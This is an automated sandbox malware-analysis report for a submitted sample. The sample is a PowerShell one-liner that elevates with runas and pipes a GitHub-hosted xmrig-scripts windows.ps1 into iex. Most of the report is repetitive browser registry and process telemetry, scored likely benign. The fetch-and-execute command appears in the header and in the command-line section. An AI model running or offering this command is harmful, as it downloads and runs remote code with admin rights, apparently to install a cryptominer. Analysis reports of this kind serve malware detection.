Malware Analysis Report

2025-03-15 00:52

Sample ID 240626-qf6tfayflm
Target http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Tags
defense_evasion privilege_escalation
score
3/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
3/10

Threat Level: Likely benign

The file http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex was found to be: Likely benign.

Malicious Activity Summary

defense_evasion privilege_escalation

Access Token Manipulation: Create Process with Token

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Checks processor information in registry

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 13:13

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 13:13

Reported

2024-06-26 13:46

Platform

win11-20240508-en

Max time kernel

1800s

Max time network

1890s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Signatures

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133638812360313822" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5032 wrote to memory of 4452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4452 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 1992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 1992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5032 wrote to memory of 4868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

C:\Program Files\Google\Chrome\Application\chrome.exe

